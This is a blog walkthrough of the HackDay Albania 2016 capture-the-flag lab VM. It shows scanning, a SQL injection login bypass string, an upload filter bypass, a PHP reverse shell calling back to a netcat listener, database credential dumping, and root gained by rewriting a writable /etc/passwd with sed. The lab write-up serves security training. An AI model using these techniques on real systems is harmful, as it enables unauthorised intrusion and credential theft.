18 January 2022

Pentesting Fun Stuff

following the cyber security path…

HackDay CTF 2016 (Albania)

Location

https://download.vulnhub.com/hackday/HackDay-Albania.ova

Introduction

Hack Day Albania is the event that brings together students passionate about cyber security. This activity is organized for the second consecutive year from ALCIRT with the support of MIAP.

Getting Started

Starting with a nmap scan.

┌─[n13mant@planetmars]─[~]
└──╼ $sudo nmap -A -T4 -sSV -p- 192.168.171.3
Starting Nmap 7.31 ( https://nmap.org ) at 2016-11-28 09:46 CET
Nmap scan report for 192.168.171.3
Host is up (0.00023s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 39:76:a2:f0:82:5f:1f:75:0d:e4:c4:c5:a7:48:b1:58 (RSA)
|_  256 21:fe:63:45:2c:cb:a1:f1:b6:ba:36:dd:ed:d3:d9:48 (ECDSA)
8008/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 26 disallowed entries (15 shown)
| /rkfpuzrahngvat/ /slgqvasbiohwbu/ /tmhrwbtcjpixcv/
| /vojtydvelrkzex/ /wpkuzewfmslafy/ /xqlvafxgntmbgz/ /yrmwbgyhouncha/
| /zsnxchzipvodib/ /atoydiajqwpejc/ /bupzejbkrxqfkd/ /cvqafkclsyrgle/
|_/unisxcudkqjydw/ /dwrbgldmtzshmf/ /exschmenuating/ /fytdinfovbujoh/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: HackDay Albania 2016
MAC Address: 08:00:27:98:0D:5F (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.4
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT     ADDRESS
1   0.23 ms 192.168.171.3
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.08 seconds

No usable banner information at port 22. Checking the website on port 8008.
website01
The nmap scan showed the use of ‘robots.txt’. It has a long list of restricted pages.
Because I don’t speak Albanian, I need to let Google translate the found text:  If I am, I know where to go;)
After removing the pop-up box Elliot from the show Mr. Robot is visible.
First checking the source code. There is a comment at the bottom:  OK ok, but not here :)
The background picture didn’t had any information in it, so I start with the first page on the ‘robots.txt’ page.
Great…..Memes with Albanian text. I hope Google don’t mess up the translations and I get pointed into the wrong direction.
The translated text on the meme is:  Is this the proper directory. Or is it jerk.
Right. After checking the second page it seems I’m being trolled. To automate my search a bit I create a small bash script to cURL the pages for me and give me back the html. If there is a different page, the outcome should tell me.

#!/bin/bash
while read x
  do curl 192.168.171.3:8008/$x >> curl.txt
done < list

vulnbank01
vulnbank02
vulnbank03
When entering a single quote, I get the following error.
vulnbank04
Looks like a SQLi vulnerability. At first I tried SQLMap, but it couldn’t retrieve the databases. After a while I searched the internet for some information about SQL authentication bypass and after a while I found a nice list which I could load up into Burpsuite. Unfortunately I couldn’t get this to work either. But the idea of the list sounded good. So i started to probe it manually and after some time (a lot), I got in using the string  '%1#.
vulnbank05
An uploading mechanism. First I tried to upload a php file containing  phpinfo().
lfi01
To bypass the security I change the filename and MIME type with burpsuite.
lfi02
When I view the ticket I see that the command is being executed.
lfi03
Time for a reverse shell. For the reverse shell I use the php script from pentestmonkey and upload it to the server. From the browser I view the ‘ticket’ and the script gets executed. I have my reverse shell.

┌─[n13mant@planetmars]─[~]
└──╼ $nc -lvnp 31337
listening on [any] 31337 ...
connect to [192.168.171.2] from (UNKNOWN) [192.168.171.3] 34432
Linux hackday 4.4.0-45-generic #66-Ubuntu SMP Wed Oct 19 14:12:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
 18:22:55 up  8:45,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ python -c 'import pty;pty.spawn("/bin/bash");'
/bin/sh: 2: python: not found
$ whereis python
python: /usr/bin/python3.5m /usr/bin/python3.5 /usr/lib/python3.5 /usr/lib/python2.7 /etc/python3.5 /usr/local/lib/python3.5 /usr/share/python
$ python3 -c 'import pty;pty.spawn("/bin/bash");'
www-data@hackday:/$

Now for some reconnaissance.

www-data@hackday:/$ cat /etc/*-release
cat /etc/*-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04.1 LTS"
NAME="Ubuntu"
VERSION="16.04.1 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04.1 LTS"
VERSION_ID="16.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
UBUNTU_CODENAME=xenial
www-data@hackday:/$ uname -a
uname -a
Linux hackday 4.4.0-45-generic #66-Ubuntu SMP Wed Oct 19 14:12:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
www-data@hackday:/var/www/html/unisxcudkqjydw/vulnbank/client$ cat config.php | more
<tml/unisxcudkqjydw/vulnbank/client$ cat config.php | more
<?php
-----[SNIP]-----
$db_host = "127.0.0.1";
$db_name = "bank_database";
$db_user = "root";
$db_password = "NuCiGoGo321";
-----[SNIP]-----
www-data@hackday:/$ netstat -l
netstat -l
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 localhost:mysql         *:*                     LISTEN
tcp        0      0 *:ssh                   *:*                     LISTEN
tcp6       0      0 [::]:8008               [::]:*                  LISTEN
tcp6       0      0 [::]:ssh                [::]:*                  LISTEN
www-data@hackday:/$ mysql --host=localhost --user=root --password=NuCiGoGo321 bank_database
<-host=localhost --user=root --password=NuCiGoGo321 bank_database
mysql: [Warning] Using a password on the command line interface can be insecure.
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 29
Server version: 5.7.12-0ubuntu1.1 (Ubuntu)
Copyright (c) 2000, 2016, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| bank_database      |
| mysql              |
| performance_schema |
| sys                |
| vulnbank           |
+--------------------+
6 rows in set (0.00 sec)
mysql> use bank_database
use bank_database
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
show tables;
+-------------------------+
| Tables_in_bank_database |
+-------------------------+
| klienti                 |
| tickets                 |
+-------------------------+
2 rows in set (0.00 sec)
mysql> select * from klienti;
select * from klienti;
+----+-------------+---------+---------+----------+------------+
| ID | emer        | mbiemer | bilanci | username |  password  |
+----+-------------+---------+---------+----------+------------+
| 1  | Charles D.  | Hobson  | 25000   | hobson   | Charles123 |
| 2  | Jeffery     | Fischer | 120000  | jeff     | jeff321    |
+----+-------------+---------+---------+----------+------------+
2 rows in set (0.00 sec)
www-data@hackday:/$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:108:112::/var/run/dbus:/bin/false
uuidd:x:109:113::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
taviso:x:1000:1000:Taviso,,,:/home/taviso:/bin/bash
www-data@hackday:/$ ls -lah /etc | grep passwd
ls -lah /etc | grep passwd
-rw-r--rw-  1 root root   1.6K Oct 22 17:21 passwd
www-data@hackday:/etc$ ls -lah /home/taviso
ls -lah /home/taviso
total 32K
drwxr-xr-x 4 taviso taviso 4.0K Oct 29 23:07 .
drwxr-xr-x 3 root   root   4.0K Oct  9 13:13 ..
-rw------- 1 root   root     17 Oct 29 23:07 .bash_history
-rw-r--r-- 1 taviso taviso  220 Oct  9 13:13 .bash_logout
-rw-r--r-- 1 taviso taviso 3.7K Oct  9 13:13 .bashrc
drwx------ 2 taviso taviso 4.0K Oct  9 13:16 .cache
drwxrwxr-x 2 taviso taviso 4.0K Oct 29 23:07 .nano
-rw-r--r-- 1 taviso taviso  655 Oct  9 13:13 .profile
-rw-r--r-- 1 taviso taviso    0 Oct 29 23:07 .sudo_as_admin_successful
www-data@hackday:/$ cat /etc/group | grep taviso
cat /etc/group | grep taviso
adm:x:4:syslog,taviso
cdrom:x:24:taviso
sudo:x:27:taviso
dip:x:30:taviso
plugdev:x:46:taviso
lxd:x:110:taviso
taviso:x:1000:
lpadmin:x:117:taviso
sambashare:x:118:taviso

So ‘taviso’ is in the sudo group and the /etc/passwd is writable.

┌─[n13mant@planetmars]─[~/Desktop]
└──╼ $mkpasswd --method=sha-512 password
$6$g9iswtWV1RYT$mfBdmezBzIz7v5pclDon55UwVuxqTBYDaeXqBdYP15xnu8zDZQ9rK5iput6mJSMut44E3hydQeYsLFfp8LUzz1
www-data@hackday:/$ sed -e 's/taviso:x/taviso:$6$g9iswtWV1RYT$mfBdmezBzIz7v5pclDon55UwVuxqTBYDaeXqBdYP15xnu8zDZQ9rK5iput6mJSMut44E3hydQeYsLFfp8LUzz1/g' /etc/passwd > /tmp/passwd
<nu8zDZQ9rK5iput6mJSMut44E3hydQeYsLFfp8LUzz1/g' /etc/passwd > /tmp/passwd
www-data@hackday:/$ cp /tmp/passwd /etc/passwd
cp /tmp/passwd /etc/passwd
www-data@hackday:/$ cat /etc/passwd | grep taviso
cat /etc/passwd | grep taviso
taviso:$6$g9iswtWV1RYT$mfBdmezBzIz7v5pclDon55UwVuxqTBYDaeXqBdYP15xnu8zDZQ9rK5iput6mJSMut44E3hydQeYsLFfp8LUzz1:1000:1000:Taviso,,,:/home/taviso:/bin/bash
www-data@hackday:/$ su taviso
su taviso
Password: password
taviso@hackday:/$ sudo -l
sudo -l
Matching Defaults entries for taviso on hackday:
 env_reset, mail_badpass,
 secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User taviso may run the following commands on hackday:
 (ALL : ALL) ALL
taviso@hackday:/$ sudo su
sudo su
root@hackday:/# cd /root
cd /root
root@hackday:~# ls -lah
ls -lah
total 28K
drwx------ 3 root root 4.0K Oct 22 17:21 .
drwxr-xr-x 23 root root 4.0K Oct 26 21:48 ..
-rw------- 1 root root 58 Oct 22 17:21 .bash_history
-rw-r--r-- 1 root root 3.1K Oct 22 2015 .bashrc
-rw-r--r-- 1 root root 61 Oct 9 13:36 flag.txt
drwxr-xr-x 2 root root 4.0K Oct 9 13:18 .nano
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
root@hackday:~# cat flag.txt
cat flag.txt
Urime,
Tani nis raportin!
d5ed38fdbf28bc4e58be142cf5a17cf5

And that’s it. The last part said: Congratulations, Now begins the report! (or at least that’s what Google makes of it).
The flag is a md5 hash > plaintext = rio
 
THE END
 

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.